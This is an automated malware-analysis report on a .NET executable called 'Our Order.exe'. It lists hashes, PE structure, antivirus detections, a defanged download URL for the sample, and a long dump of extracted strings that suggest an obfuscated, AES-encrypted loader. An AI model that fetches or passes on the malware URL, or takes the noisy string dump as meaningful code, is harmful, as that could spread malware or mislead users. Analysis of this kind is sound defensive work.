File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 232.50 KB (238080 bytes) |
Compile time: | 2018-06-24 17:24:44 |
MD5: | e35f3c5db0be3a9a274d5e4dae817dd7 |
SHA1: | 907bceafb9a0c1b439ad7694916db7cb6148ca51 |
SHA256: | 3fdbbfe0389de57ec483d9ffc44e316f2c4a7acd166fca7e848211c2c03f660b |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 3 | import resource relocation |
First submission: | 2018-06-25 21:42:09 |
Last submission: | 2018-06-25 21:42:09 |
Filename detected: |
- Our%20Order.exe (1) |
URL file hosting |
---|
hXXp://abatii.web.id/apaci/Our%20Order.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-06-25 04:50:13 | [11/67] | ![]() |
PE Sections 2 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x13534 | 79360 | 564ee5ce905d0e83314c8f13d0e2b37f | 98fab1c42dcf6b2c2d7be380d1611089cf4789b6 |
.rsrc | 0x16000 | 0x26800 | 157696 | 3917e23c2e3a8616ddeb808be73b5cca | 5cd0b49eaf8bde92359d536f461354f2411c23d9 |
.reloc | 0x3e000 | 0xc | 512 | fbce0dc197dc58747d849400ea9e71b7 | 736973dc141c23db99c8c388ec00159d5efbdbba |
PE Resources | |||||
---|---|---|---|---|---|
Name | Offset | Size | Language | Sublanguage | Data |
RT_ICON | 0x1a3d0 | 16936 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_GROUP_ICON | 0x1e5f8 | 20 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
RT_VERSION | 0x1e60c | 524 | LANG_ENGLISH | SUBLANG_ENGLISH_US | |
RT_HTML | 0x1e818 | 122361 | LANG_GERMAN | SUBLANG_GERMAN | |
RT_MANIFEST | 0x3c614 | 490 | LANG_NEUTRAL | SUBLANG_NEUTRAL |
- API Alert
- Anti Debug
Meta Info | |
---|---|
LegalCopyright: | FC1gBi7e |
InternalName: | Zv9iDGTW |
FileDescription: | ifTmW0ei |
Translation: | 0x0409 0x04b0 |
OriginalFilename: | rxEVuhhe.exe |
ProductName: | kMQFVh5w |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
mscoree.dll |
IP Found | |
---|---|
No IP detected |
URL(s) | |
---|---|
file:/// |
Zv9iDGTW
ENMkUpvLkN6k2iwVib.jOQDBSblkHe1GjR31l
VarFileInfo
FileDescription
{11111-22222-20001-00001}
ifTmW0ei
rxEVuhhe.exe
Location
$this.TrayHeight
{11111-22222-50001-00000}
GetDelegateForFunctionPointer
{11111-22222-30001-00001}
{11111-22222-40001-00002}
kMQFVh5w
$this.DrawGrid
$#%#&#'#(#)#*#
StringFileInfo
Translation
ProductName
System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
InternalName
{11111-22222-20001-00002}
VS_VERSION_INFO
040904b0
file:///
$this.GridSize
$this.Locked
{11111-22222-30001-00002}
FC1gBi7e
$this.Localizable
{11111-22222-50001-00001}
OriginalFilename
$this.Icon
LegalCopyright
{11111-22222-50001-00002}
$this.SnapToGrid
{11111-22222-40001-00001}
System.Security.Cryptography.AesCryptoServiceProvider
$this.TrayLargeIcon
{11111-22222-10009-11112}
progressBar1.Locked
$this.Language
progressBar1.Modifiers
;tj
trWY
;}=<c
E-`pi
;dh(
gm7dxdO35LBk4kKthxK
8^?]
smethod_12
smethod_13
2 #,
smethod_11
SerializationEvents
2TZE
smethod_14
smethod_15
pidp
Q-w>5
'}-2]
VIJ%
Int32
B`=r
@Z
9:P*
ObjectHandle
A^1>
K Lh
]lh9
textInfo
ogFP
v]+3S
2- ,
efc4wN907O4dWumnIL
_VpTH:
&*^ H
&+;&
[DbTD
'? 8>^
'`A-
GClass0
EscQiCvUuSVPLHwoADx
%H"
rJ
E_VWM
?sOHZ
smethod_10
*^ 0
{rlj =
R|}mq
smethod_16
+>Q
]|]o
)ju+
smethod_17
\$HL
_5twpiG-
SLR%
u !v d
|: ot%
*;,n
pmh0LHZimXBinSdNeUf
`s4z
CryptoStream
2qNU
^p$k
KO9?
xXlS
\pRV
%_!=
ToolBarButton
?Uc8
smethod_0
smethod_1
smethod_2
smethod_3
smethod_4
smethod_5
smethod_6
smethod_7
smethod_8
smethod_9
CbHSRSviGYM9u1HEZv9
_DumzK
y/^\9
xC<w
Ir.~
PNG
h4=C
fL|[
To5-Q
%:5uor'u
Ctqv;
xek<UE
Y3<Ntu
1$HT
KRUsDmO8N7mjmQ63jZQ
Marshal
:8'
compilerParameters_0
yku
e'B#
k4^-
-BF!
fieldInfo_0
P\0o
fDN}
R]^^s
SystemThreading_SpinLockDebugView
=P8d
RuntimeFieldHandle
gBZ ~
d~)[
QFJ'\
cL6OZ
.*Ho
yj_&=
zY0_|
$OpU
l@I/
BasicClient
#m)D
ATmSOtvoZGloVPGRIUA
p)cc@
(tJUQW
EndInvoke
PropertyItem
qTkI`
L*=
.IE_
u5|5j
FileMode
k>A|
YFa(f
aQ@H
r-#a
stringCollection_0
GF[
-U>
Pp90
$7Wv
ZjBxEAftu
.}M[
SWKxJdO76rfYPBxbipT
currencyDecimalSeparator
:7`k
5L#x
0'22
W7-!MD
~BSB
/vq=
^T.3
mY77)
Kdyrv0GUQHgQSk0ZR8
@{G6,
AssemblyCompanyAttribute
>5&*NDH
Se31ebOzvkrPcjGK7T8
Z27l
HL_j=;Ajij
Format
m_useUserOverride m_win32LangID
?6+sE
,0PL
JKF@
xllbiYOTg0MFCj8FKvK
jE$O
XuI(.s
VPBPX
5AHK-
k$MP
*(Jc
]f!r
ifMH
@fBW
uyff<
dqkc
_o?k
E:"
IcfRaQFwFU5mcU1my1
/NK_
n%f}
:L $
)T8}
~=U"
eZFYg
Bj3:p-
PADPADP
<}Yk
WZ=k
:eQ.
sortedList_0
aM {
n$HA
^B.p
wB 2
|=&$
'1iTk
e)ob
-~+V
$}d#`#
FromBase64String
VMiumWZKQ0GeC5gdqj1
J<k:M
}$ !Rw
tGf4V
AssemblyTrademarkAttribute
set_IncludeDebugInformation
m_listSeparatorm_isReadOnly m_cultureName
YF(^a_
o+nd
ftAH
Uw6qA!
e=}^
_ x
R-_j
+dq(
%*esA2
So !
w^)ye}
tfr,j
Mpe5
9=C/)t;z
"B{gQt
V9~1
w@4
#Blob
X#H?
ne z
M`y,
<s ?
T$&J7
Jq65qlZJXb1j7Qr8ksg
VC6-
.G#s
y(Ed:
UT8G1M33ui7ev
$829`9U
JVQ8h2vuGAUDOUeSyok
l5%.
>nBt<
B_ 8:
W,\)
lw:~
pBr&
ConnectionGroup
bxIx,\
Type
R"8IoGaT
Xk;V
wLHx
_V`ln
-?Wd
p"}t
Ejl >
]7<f
kruR3
.UNG
_^RT
`LpZ
yjHrDlZ3vb3NYrM3Fnj
l88c##
-T8b/
ceJjVCOPtJvFIp2Ui9y
2itfO=
t x
,WE
XgKG
X="
+!#
<vpcY
MBErrors
$$method0x6000007-1
DN]3
8`q>#
E?O3
adz LhfO
H6r^
numberNegativePattern
jx:*
s\aGc
jB\ft
H*3o
}`!'Em
!r&W
DaTbbtZsfCXfrOq6fo4
+e(F
XYPdxMruPJ2VlrFrHJ
b?(;
_;fo
]\nscb
<ReadAsync>d__145
OdbcRowUpdatedEventHandler
ushort_0
HashAlgorithm
V"mnk2
wHfOJ7fOgCYs41pHr5
K%|
9"MxA
ConfigurationSettings
Taskbar
0k$w
ListView
O.8 _0;
+LA0
ResolveType
(%
GfG3CtZNFPN2NXSxkkm
&*2(X
MZ}
y/x
t8OF4KZ1300ecpcIMC
@X4Sv
opOF4
D^W@H
|=]|pqB0
!1c)
:UQJ
F)dC
c5v9sZOymRDMhtM9c06
RR6B
8(BE
@b-,
RS?
wV:9
qEW,
zSdg
.text
|d-2
ce4DmfsmSrOT856tDgfrkMb
GetString
9%"|@
>3we
uv a
O~<~
28G!c
R!r_
Jd~A.p
Convert
Z:n(Nl
+!&+ #
positiveInfinitySymbol
)s's
object
56 B>?f
=vL&
f16G;
FlushFinalBlock
numInfodateTimeInfo
d\,g)
'5Um
0c:z
StreamingContext
E4ic%
5JGW_
L0B<~
0u=o
FlagsAttribute
rA7}
|++!z
$$method0x600005f-1
$$method0x6000020-1
CMPrbSrAyBNsug8I0b
$$method0x6000020-2
CTfxAGAQC1V0BRc2J9
:ZVQ*
.=c=
EQe)8
?6|[
encoding_0
jsl+
Aq#6
26OY
skZ9L3O4YfkKJes8Oq4
7K<jI@K
F <+S~'
*dCt
z-
QYE,
Qe_7:
jy\nu\uGC
CipherMode
quB
S 6Yj
B3'+
?pnm
>03l
EhavB]K
0(dX9
q'
\xku
?,,,
NP9A
-7])6S
+6["AW
OVtY
TypeLibVarFlags
Y4vf{C
System.Globalization.Calendar
fR{D
JcRB
`.rsrc
}:Jq
|- w
*'d
u EH
=V1J
Eaoq *1&H
!]O&
S9 v
*2(c
t*v){
IconData
|_Ip
5#H#
3Ng5
w];
%QA{
*2(l
result
!Kdly
$_`v
R+,/
=Cm4r
l1-\z
<>c__DisplayClass172_0
:VM*m
kpHY7
get_CodeBase
5B}B"(
Utilities
*2(L
-Infinity
v ~W{
tb.uaRCY
-9|
Qw$[,
3gno=
bL*^F0~4]
d< p?|
;@n
,7L7%
*2(0
1 A
_1)Y
}D5b
zBEFnjuu2MaeeyYmxi
D{<#
{p\C2
J@Ev
Y/pst(\@
"[((
hC9c
xoYgoGOow5lMB8xr4Jg
+kM]
})WaZFv
7C0H
eL}SC
kr*
height
D!dM1
W{.q0
Prd!
<6}"
-8o]
delegate1_0
delegate1_1
StringCollection
O_Lk
y$GX
-ur
culture m_SortVersion
+GV2N
9=9`
w:kO
i235ncOCJbMlBf1AZS4
,36
EkpHDB
J+*b
vLF"m
3n5J
>g5b
[KD_
lhY.d
rk
$O@2
t[}+r
G KY`G
!J,'v
biUV
GetBytes
TargetFrameworkAttribute
ToolStripDropTargetManager
~_@l
7LnK
ReadAllBytes
9A9)F$
9j~HE[
Enum0
(1XrLJ
dUZ
,`RC
lL32TeOeKAK6IFAXMLI
+&&+
< H,K
g8kBbYVHMjINy0qRad
Write
,+E
uSGwCYZGjxL3tXl7uAe
& nl
zj`[
s0TnVsZDcba2MDVlSaC
nativeSizeOfCode
get_Assembly
^i HD
sR[D
]<}|-
j}^vm
$O0|
MB@Q?1
R;:+
St!b
-sI
JW<E_
ci9/
bK'/
*2(%
)P3S
O(wk
I"x)
/.1
Bjm#
*2(>
8d4+
+R~1
\VTP
*^ T
System.IO
WrapNonExceptionThrows
:SzR
System.Globalization.TextInfo%System.Globalization.NumberFormatInfo'System.Globalization.DateTimeFormatInfo
numberDecimalDigits
B3Y
=wKR
MAErZxLoEbXH7n9OQQ
j2IBX3O9lki1iDJ7MLR
X|NL
Z(YE
> )o
v(dA10
Console
}H4X
wL$S
System.Globalization.SortVersion
B3'#
'_RQ
ZV*v
Si_R
1E;
percentNegativePattern
w?zHe
-<&
fEZSQOalnKhG40476s
@)Z
yXe^
<C#K
@ynC
+ h.
int_6
C:Y=
0A]s
}H4a
H8cvXV
tb2\
%q0;
X9_
vvS?
gv4y
:S>h
_8AC
IHDR
System.Runtime.Versioning
:4%<(
40^bf;
jCEKM
DIiKrbbmfBqO
`Ccy
7^lqL L8
^k{-
IconSize
Ipt
#t&x
jNh\
qii
mt>JL
NetFX35SP1SKU
XNexwYZfNttqcl2pWxS
2Uk]
]%tX
R>cp
DKV.
U6Bvi1ZZsYYYHevqfxe
I68Ip
System
WyKHSrO1Kq6Vg84we92
Tzdp
Microsoft.CSharp
x,3\z
System.Drawing.Icon
@w#u
3sOp
VfT\
kUVC
BOBSSg69ubdY9spVJi
tj0
3s[`
Class8`1
61RP<
CreateInstance
~u"d
$$method0x6000039-1
Ib2Z
FieldInfo
gF&P[
JLVy
MethodBase
#Strings
QrFc=V
`XD`O
System.Collections
j]9
/=Ov
|7&;
set_UseMachineKeyStore
5fHT
R 4+$
L r=cP
ENCMetaData
z/1o
dn#k
E3z?3
U `r
`qsF
&+w
memoryStream_0
StandardEventOpcode
aN/+
N2=Gnl
0MWL}
currencyPositivePattern
!>[B
8C{BZ
ScBE
c S$Gk
.jjk
digitSubstitution isReadOnly
TG&l
Qc p>
width
>x ;j
:#GW
,g&
K<Y<B
get_EntryPoint
pc}T
~s36
GDWh
Lpse
Ohxn
T%R\
*J?qT
#2`O
~w^6
~OekQ
,'+^
string_0
UcC$
System.Diagnostics
IntNativeMethods
GetType
l[uP
M 4-u% j\
4k'p
{"umi
XT*F
PNr%
kF[zH
1j##
ap:\;
D ~jJ
X9tD1YIPCYJPWlPeGq
3:%w
c:}
CK`H$
BChi
Module
j mh"
lEiwfEm05DVL028im9
Activator
bo`Q<
MJ2@
Zi>9
(@!db
,NE
J{r
mMMKE5ZS2yJO6Xnp9RH
COMException
$A2ng
T/6A
0 On2@{5i
ovbuehZ0IHdaAwgPvwd
D"@)
(B\(Ww
Xn.pe
cG+ &+
q~)0
:&%L
V|C.
|PTn
zhrFniO6JX9vpMEFiHJ
method_10
Double
$sI[z
}xj7rt
v%k,
O`d^
E1o
CompilerResults
2:e>
":4>P
_vbzb
F)KO
MIbdhSOba8Cc7PrQuIb
NgXQf
)I&6P+
+J 2:
MD5CryptoServiceProvider
xw1IpYZqHgtTFaldO2c
Jn]Z
get_BaseStream
|F0
:zj[
:]Qv
{q!c
F]]MU
Z2e>
get_UTF8
QSFIPkOGFE4OrOhwdJB
2D'TTWn
l(N[
TrWfJeUg3AMDAJTymK
Hs0Vj5vtBisuCHInAf0
*2(
&q7O
*n2(
j)c'Q
P+Class7+Attribute0+Class8`1[System.Object][]
tP|FV
zB<kU-
AssemblyKeyNameAttribute
=R9+
lAN&)t
0T-N
RequestState
~JyJ
'fKiYp!Y
8PQb
`M}9
]Q!t{<
WXTZ
([$;
get_ManifestModule
78V&Z
{4S`y
;1g
wf0koxZPynwFStOYq24
m d]
x6kBd5Ox209kPKotuTp
"3`)
Z1@wt
H`!t=
3db
BitConverter
NU4aW67LbTJKgf5wy5
?K!^X(
>u
i7W3jsZOKHUh47frGTA
sEl~-v
vT2
JV2|
3THL
V~e
-k&+)#
(.9(_
Jr+Z
m_useUserOverride
3 :UJ
NbT{
QIQ
8='
0E?!
6Ok~
hvF]f
,;y'
BvDD{Wx
System.Core
C(T+0
agPZ
E VJ
{Wv
5B *
~}#
~>|]
2PH%{L.
Delegate
AssemblyName
~BT
lWe
NKGK
&|rV
toWH
b7MV
,[7S
Func`9ConcatQueryOperatorResults
%"Mix^uL
e$O@f
get_Unicode
9s*Z
A{Fw
R\V@,
2&" .
J@{%
*fSC
1*=@
C3PlW
&*b(
bHiZcYZpg5X92jDibXu
quB88QZdJaNltHUWOpu
:N[-
QsoT5lO0C0CoqlonSj8
^2\2
(yxk
JJXqM
"4F1
0501
HCSxkybdtWhoPLh1j3
Enum
JoJ7Vit
^I%i
3<(,
assemblyName_0
h0/^
B#z;
$?cN
6QWO-BNI
z)
m`)|j
oopehIZQZMXDvi7ZyE5
"fCQ
Y9)d
;D e
,QE
get_Length
0L cZ
perMilleSymbolnativeDigits m_dataItem
J<DNZ
QeWaOqOh41XEQYa4yxR
-1&#
)-PYd
h^e~B
"Wg (
Ae34
Dpv
T0G/As
-{&+l#
object_1
R;4?S
+@ ,
bS2J
=$Xm
!zk30
pIFnNZv82ZaBDBNkDd5
#-JA
x@s}
DoTr2b1UKeSFAle8tC
G /z g\9Mo
tEeo1
ReadLine
CompileAssemblyFromSource
&+E&+H
XQ4"k@
f_`X
ValueType
))w,
OW7b
System.CodeDom.Compiler
Ma2~x
hI8PB
A# 4;dC
Q:p-{
[+2+
4Xz<b
Y;9A
ToLower
[Jk,
Tanh
UJ8a2
&*F
System.Runtime.CompilerServices
i+<ee
J9=WL
Trim
FcWyUOvaSdN2sKPv9vR
validForParseAsCurrency
cC'$
System.Runtime.Remoting
9[jBq
F+"-
'Rc
ac'JB
f[2a
za5329Z5v3bBpm6f6ph
o;B{V
bmoo
0&Xc
J\az
XY.>
"~bOMLmmJf
%6u$
r 9)
HgPU
OCTgmqOMngcLLbcMoo3
~S
zZuf
<A<6
[(L+
lR3ZxgZoB493ScMt8ZV
}-r@y
3 L3
D '1
M*XK
5Rgf
9s M@
=Jaq
z,usC
1^A,;V
2N@B
UInt32
ToInt32
dt:S
Z1"<!
BMtuS
assembly_1
assembly_0
b=v=
_B-4:T
ToString
oQS10
/OJS9ij
=r@EDU
18Y7(d
IDAT
ConfiguredTaskAwaiter
Environment
2-d
mCC+
zC\r
2' !
zx"I
@Z 8
array_0
Xp5%
*vf
MfoSossRjIav2OLZTU
|D3/
0+6_
Jc-Q^
vN[P
#kYi?[<
fNO~
D2!Z
FOHBelR2F72DCO4TlG
lKtG1M3zKMrsE
jGibPtNqYMIt
t/Q p
3:,
;~A
jn/SG
r,*n
Unwrap
XapM
(kh c
S 8E
T7?prf\
"Z|m
rU%x@h
*F <
ICryptoTransform
GC718SOwhk2Tv0Wdjhr
U3160EQRNs2MokYM76
hMeD;
W;/p
Tnb=
yR<G
d>Ah
1N-`
args
AssemblyTitleAttribute
exRDbhvveJYmifoe6gQ
AssemblyDelaySignAttribute
ewU1Z5ZwohZKYb6PilN
fjt,
cbij
e`QR
+/kD
Kr1eq1NuA79KfdboZF
M/6b
IL[0
ya:
;~<
^7L)`X
System.Security.Cryptography
] -
q+!v
a0-;
MemberInfo
U To
nGLxIEZR5bNdl85S64b
SoapNonPositiveInteger
+M?Ew
I"@ 6#r~
yUEd3VupE1toR5aQvD
B$IP
% 5%
jr26n
a3
=d:Tw
~X~`
#K'j
`jh uO
PhMwW2YjqIiujv57Ud
IDATx^
K8 s2
I;*Q\
Rl<d
?,}&[
32,\c
8D :.
?MbY
%Y>>=
qgLIeFOqEHXKKJRBAK1
3m M
M wu$h
$^aq
C \
ToBase64String
currencySymbol
=|e~Fo
numberGroupSizes
o5nR
^B
k0^
!esjU;
numberDecimalSeparator
uAe8ZfSQiQtGe36idi
rKH0m
pHYs
.ctor
StorageFlags
hnaRXwHPxTqc0FMUtH
`#J1
x9jJ33hdINpfuLOWrN
X }
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> PA
sdyt
*j(?
4[O~<<
A*0
BQ c
xA &w
&+/E
X i
Main
;+ P
>\)7
Invoke
ORtaL
u!#'
LE Q
method_2
method_3
method_0
method_1
method_6
method_7
method_4
method_5
-/E
method_8
method_9
wJQ6r
AaQPe7OBCb8XXDjIahO
- &
v4.0.30319
7Lb
X 7
v1^A
X 4
tV &,X
goycXPmPW2bacXsl7r
/C?5
ep5xwu
/ -"
tD83BYZUuMiOG2k0VMB
dKY
[t|t%]
C@qd
+1 oGL
-z h>
Delegate2
Delegate0
Delegate1
FileSystemEnumerableHelpers
^ `}
FrameworkDisplayName
Array
x9 %2~q_
yq0qKnwZXDcRbddgSR
8"4@Vh
bCz}6i
aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources
intptr_2
intptr_3
intptr_0
intptr_1
paMW
(Y\*o4
@.reloc
, &#
DLjb
uFPL
fY }
Z8fQ
9-Q
g4bx
i=kK
dXDk
;D2v
C(R<
6MYb
Y\/
b[\7
^S D
dMZ3Y2a[
Byte
gEmG1M3QXLMBw
a##c[
CryptoStreamMode
currencyNegativePattern
UV2PyoygTf55nsjvGp
get_MetadataToken
*^ ~k
:D M
R~/6
Jih
B .,
C;6i:
GKTnoTZEnO2dJHxjjrU
attribute_0
2h>E9
DZwjQ9ZufxmUtVMuoSK
XxJvnfpD5KUtedBxae
uQ~F
U$$[v
&+D&
4SiM
_~rX
IGmuQKGRwDvPWacUZ0
compilerResults_0
Qixu
tundgCvLaL2SouiiF5j
NetworkAddressChangePolled
;)4w
_<(:
numberGroupSeparator
R~kYg
AU[SV
R@7iF.
|x j
get_Location
}EI
\,i(
I.}S
;/8Q
Nug^
nVM1yrIxsWJcaDGZ.g.resources
VcLp
&I#N
BLqH
}DCH
0UA-
*u;N
CdBM
'Xh(
comp
5 IR
;O+;
&YUO]1":
"#WC
D9P
wa'}
fyn{
L!go
4[*'^
B3$#
HONYgH3VVHLLZpGhi7
6U*d=
Gm9tw
DebugXmlSchemaComplexContent
OYBbJ2WO0bffoDTlIk
z`SC
(3|
get_CompiledAssembly
DisablePrivateReflectionAttribute
&+/&+l
Z``/
System.CodeDom.MemberAttributes
B?8|
K[ i
WuC:
FileStream
*CEQ
e~ u
\
"JdV
RuntimeCompatibilityAttribute
UK;b
Y*ijM
&
f`aX
-6+4
=8p
ug~JO
NY.<
PJ0A
Assembly
=W2T
$O@Hm
m8"H\0%
<1*+c
9c ,
HLf'
T >y>Z
oFEEMGeiIVCFJkJeh1
5vfl_x3V
8'
{UFG
\}&
vQJ@
mw9@
Y aQ
%veJ
a^`s
EJ@n
KwhF%
System.Drawing.Size
& P
*[C%+
,X&+<
"b
w#%;
ExpressionVisitor
V{so
Sbq7LEZ8sSwU6YsTlYR
,SNkuo
s3I
-A+j(
& l
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
|$4>
4/y*2
set_GenerateExecutable
ASWntP
nG(V
Y -
OTt 0
I*EmM
Y *
tSKuX
$y. d
5]c|
,DE
6^#fv o
Y ?
e9>}
&5)$
AvaLk8vEUD3ftvUm5Q8
%UE1B
lF}(
yeqZosxGlLJyo96ENQ
)/9vH
nSL6
&*w
tre<| Z
crj
*ms-
/ >W
m_name win32LCID
T+e^1Y
Y n
vw7jR
?o?^Y
ExpressionIterator
H#h S
wo:z
d|T}Ne Cvk
iMoz
XUgO
}o$]
g[hD
'[ v
&3_x
&+4&+<(;
^6^`
H2j4wxFNEYNAWDyU01
wqEtmLZeAKBX5u3eUKh
h*F#
b4b%5
\C!T
QXPloM5eLUmAcJ6Wdp
[ Oo
X t
*It![B
62$?
]WOZ(
M[+5
0&q
X {
e\4
OT*Hu
(;B7
M\X(/
;%OH
X a
qEK4nr86JiOjYxL5yj
k*<7
hashtable_0
CallInfo
X k
X h
R$/P
tkOiDbZhcKWPyDjJUNK
c<;,
X ^
(yy|Y
eJeWZOZ7Sy0dS8AB0qU
RYmUt6OlMTgnNxO5PsR
3]Sl
XE&pF!
i F:
2R=*
& Nk
m~k
vne.
5r\=K
X :
@ :j
BS3cp$(
<_lL
cr<N
WQSX
!QFl
X !
-a&
bF9V
get_ReferencedAssemblies
XSlc
-KSB
EM3r
zAh@
]xx6
QOw#
57Lb
W\>g|
ansZmYZyvDU2TOtxWcu
{P~a
k6oKL
PropertyInfo
^0H2
W~0}
/;q
50Us
usIp
Sgfr
)PVe`
!"S'8v
Ue6G7uOphX3Jt1ppmdE
<he@1
HostType
Dyf`
XkWU0COE7vpWDJv54lh
M /x
m_useUserOverride m_isInvariant
Bkto9
X|!v
Hb~<kfBdu
aKVuN=
!zQ8H\
K*i;
Oh_]
nchwqso4BoMsbseLrS
xqy{Na;C
-<g<On!
SystemThreadingCollection_IProducerConsumerCollectionDebugView`1
method_11
0Q'=
}aiE
EjX%
-9pje+
+=#
-o8
CodeDomProvider
ReadBytes
ViU9Eo2D8itLH3hkCT
o,1 <)3Y
Kc
4*<x
lE{J
UV5iwHv76oLQL57IvP0
cryptoStream_0
AssemblyCopyrightAttribute
;t'D
WS0-
m29
xlPZ w
afgyt3NAkq4uNGtF1J
mZei1
classthis
wP5dCCOiacoY2dRh5P0
vY76DbZL4mV6M9ZY4sV
aU95}$S
,[&
Xdowv
x7:f
bi9!
jvdQmhZg9xduPBOP2dS
[l
+)HFY
Infinity
YnWD
C65L20OtHlTQbYIf72W
Nw t
0_8P
Dwh>
GjY$(
Mna]
_2N#7'
J*X4
|6zpt
du*k
%!Lv
[>r|
FileShare
hCJ}
:T:9n)
r~0p3
%=ZV|
J0oq07Zjivk8wb9BGh0
1Ew
<PrivateImplementationDetails>{DDEF3C00-3864-4846-B5A5-4CCC0C5086EF}
CollectionConverter
D`I_1
<Module>
c5"y
PreviewKeyDownEventHandler
Q>fn%
+S
iK7[
C>(R
jV3vVNveb0XucSkSVdJ
8/>}
Close
1IVn
currencyGroupSeparator
=76^3
1^ /`
Bfkbh1OAv4AYUEAO5Su
&+(&
Mg6%^K
gOLNevOSV3i0738JnaK
ECSU`]
.NETFramework,Version=v4.0
Q82tWY
H{ }
OW2Xo}
n.9G
kY`#
<3$5
9McR
Read
`3$O
'1>9
#T0}
{<|:
)V5emh
&?GW
YK/~
~tIJX
YleMH
cS\i
es
value__
!v4#
b*HMuK
./ M2S
(J.`
~kL4
K0]D
n>9Uy
tw?&
6[4C
VMKm
_I6H
K (
XA/x
,rx+
mb/\2
eXjyMGXyjRWPJTsEWg
>8L1
'sZn
gAMA
`gk W,
jP` $
WF D
Sb`T
~'v#
wc R
Y ,
!xOt
Xo9l
1g>l
#|}H?
jCs
U;DN
rb whjO
_36Rc
Ze5
Y ;
Oj"H`
fk~x
.cctor
AsyncCallback
SortedList
<Lf53
}CX'
mscorlib
|5=&c
KA((
>aa!
dcs(
Q1I77ZOOytBD6fMnceQ
h'DsI
lYeN
j4&S4
xT9~4`
Za[u
99A%
5}62
hLL[KR?^
Y l
AMD,{
GetMethod
)P*6x2
Y q
tbIGf2OfHStE4ZcjiAD
Y ~
: 5_
EventProviderTraceListener
H:=K
H7Z)
k.7zS
:4 #
Y J
+B=(
$q6?9
p57~
dMz
RSACryptoServiceProvider
W!{:+j
f-p"
EZ5eFPOU60KdFSQU7NS
krpWjnvCBEgmF25NiZG
b9r"D
d+uZi
o$
r|7Ws
iT.^16L
dG/+0
cT"G>|
<OF:
NM-:q
System.Reflection
fMZvHm
(2<
+}*s
DY?lI
A.w&
RuntimeTypeHandle
m+tn
lL1WYz<
method
h4a=f
fGAWa
]d&q
!z$q
O(r&
MergeFailedEventHandler
4x9"
,GY/
Ev!HXT
0A)l
wF"B
zBo2hHO2N6VHAndojXi
cI8clk
~8"D
Dts'
jDMgIjZ6KibLTPevJDr
O|`& B
34G>
)P:]O@(Q"
RXHYymD0MkUdGjUwbB
py?{j*
%uQs
9vZ'S
gosu
&+2&
int_5
int_4
int_3
int_2
int_1
int_0
luS0q2Xgg6uD4YLmVR
Hg0{
S!3!
mkO:
"h2TI
7*TGO|
7_@S
ua*
'O]B
I9;r
xcc'
UT^1i
Zx)"
J2ju
<Rw<
string_2
+%sE
string_1
)1`R<
AssemblyDescriptionAttribute
eM-.
|VRR
f(O&&
G'G
`^tAif
,Ryn
FhvY
@%S
SO3yMLOF3QPqmK0WTAD
\l1
zJK
=_f/D
un?a
'LK@
%E fht
[.uZ4v
M:]f
Z|VCM$
byte_4
]gQt
*a!D
rgpZ
Y{'\o
Wc%<
gvn1:b
t-YM
Q4y
percentDecimalSeparator
g>(KBHM
4#C/
type_0
SQL_DESC
E)aj
ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
yhPU
U+M-
RcL
_amn
CXPN
LV$6
DS
&]%<
=#:$
dUrwN
OmhM
F@yVB^
v~mB
&+C&
&*2(&
I^l A<
1r[,
4J[MS
?@@s=~
*~(0
g.ua,
.xt
?JK^
_Y >rq
exTb
$$'`
@H@P
&AXHCb.
Ce.JFkM{!
TlaV
A(MD
:OjzC
&*2(|
IDH$3
0Nh9`
F'N]
get_Message
!This program cannot be run in DOS mode. $
;T5
:uz+
bNL(
callback
wM*
p [G<
File
`-Z
BF,}
:72k
Dispose
G2gcu
nT?z
8Yl!U
s7O
(nL3
=>QD
N{!m
5!J?m
s55
LqH8
Z1|6n'
=e8H Kf
\<g6
eml5Eni08WUV19tRb5
XF"BB
4`x
set_GenerateInMemory
0|Rfhn M
[ l
o\ ?
R RO
w"Rmj
?;dL\n{A5
X42
VID:
$$method0x600027b-1
VChQBaOuJjbDkca6hLM
G?!
qHBB"
&cmLyAMCb
sh0\K"
GetValue
9"3!
omw%
m_d&
6`{O
<W49
L-HZ
`gBSO'7
5sXK0
MethodNames
J>QDuPEJ2
P4Zc#s
HDX#
q8d/
E a}
X #
/Zr/
=^=&
}KRg
y*M!
;$qx
#0A4#
BSJB
wMaQ
{|UDv
X_[g4
${IF
1MaR
*HU
BSGwE
D5!)
OX,d
op_Inequality
JpNWIuOIg4rHGLlL0PL
^R"U
N w
GetManifestResourceStream
sGy.
J/o^gH
3 )n
7"G(W
Pg|^P
\]M
EV9p
{Js
/KtY
XD-O
2yqshx?
h=2e
]6gP
a)VA
%w-u
CreateDelegate
IntPtr
BvG:
bJzY
J<_7]_
uA(@
vliarM5krQIJ811vKs
)_+#
$>_L
Hw{R
goa"
IU_X,
ResolveMethod
u:VO+
IViewObject2
,__x
System.Collections.Specialized
16vMt~
PHz=zX9m$
Swh'6
(&/H
P, gA
7ay5
\`Bgz
7-5Z
um RR
- +3
#HC !
J|E+
`b|
;4qV
}+h
=&n}
#@(v"b
OJ%_H
